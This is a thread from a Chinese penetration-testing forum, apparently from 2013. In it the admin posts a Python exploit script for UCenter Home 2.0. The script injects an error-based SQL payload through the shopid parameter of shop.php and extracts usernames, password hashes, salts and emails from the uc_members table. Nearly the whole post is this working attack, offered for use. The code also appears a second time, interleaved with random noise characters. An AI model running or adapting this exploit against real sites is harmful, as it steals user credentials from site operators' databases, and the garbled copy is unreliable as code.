找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1959|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
( q7 q, ?' M, ~- |, k' r
  i8 o3 \0 T$ q7 a4 D2 a. {& \) ~& N3 c( O
#!/usr/bin/env python  
- v. C% Y6 Q8 u. y9 R2 Q! ~$ n " I. C- j3 p1 [, b
import sys  
8 X. p* l! e! q  b' L* m+ x  Vimport urllib2  6 s7 j% `  q) ?8 L* i: G! Y
import re  
4 V0 x% T0 L& Q8 Y( ?$ k
, f0 I$ u0 `6 K' f: ^! }7 @" adef info():  4 Y) s6 r  O: ~/ @0 n; X5 f* O
    print 'From:http://www.exploit-db.com/exploits/14997/' ' e) L8 y& y! C6 ~2 _
    print 'http://www.hake.cc/Web_loudong/'
; d& {" R4 V3 w- L    print 'changed:qiaoy'  
4 x1 u/ {7 I3 Z& S2 g& b) x    print 'exp:'  
9 H, E( }8 ^; v8 W( e    print ' ./UCenter_Home_2.0.py site'  , q: x0 ?* ~  y  O1 C

$ W) c- H; ~/ H9 G" }def main():  
, f5 G. F' F" ~. J7 Q9 E2 Y/ S    if len(sys.argv) != 2:  
3 V$ A( k# Y" i& @        info()  
+ U' Q( @6 Z% ?7 V% g! @1 c. n    else:  
4 e! z* r# M/ X4 q9 U  [1 r        site = sys.argv[1]  / V& L) F, c0 _2 c& s8 r5 n
        if site[0:7] == 'http://':  0 q5 h/ `4 t# W/ F
            sitesite =site  
1 h4 n# u7 t& {# f+ B% C! z6 F        elif site[0:8] == 'https://':  
" t1 ^, l% t  S, C            sitesite = site  5 n" Z; g% G0 l
        else:  " R% B5 Y( Y& T
            site = 'http://'+site  
2 N7 V4 b" V( |        try:  
. ~4 O& E/ W* h. G; w0 Q            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
9 p7 d2 v. j6 s: S) {6 ^            Value = urllib2.urlopen(url).read()  ! [) o* U" F4 y! g/ G
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
- X. }8 I) T* Q+ r2 ^- |            hacked = Msg.split(':')  
+ O' r4 Z5 P: U8 `/ `. |8 Q, A            print 'Name:    '+hacked[1]  % I$ x5 x6 d  [. u5 t
            print 'Passwd:  '+hacked[2]  : d% ]1 C$ f1 ?' o" B
            print 'salt:    '+hacked[3]  6 ?1 O1 C' o3 Y( Q* i, [9 [1 A
            print 'email:   '+hacked[4]  7 {+ S' Z! r0 v6 W3 l3 ]
        except:  
0 P' S- _8 J2 y3 ^            print 'Sorry,I can\'t work............'    E% j+ @: h5 y& T" @+ X/ x, N+ B8 W

! f  @1 U; W1 I$ c( }4 J# J1 {if __name__ == '__main__':  
1 ^& G% y/ @1 y0 d" @    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表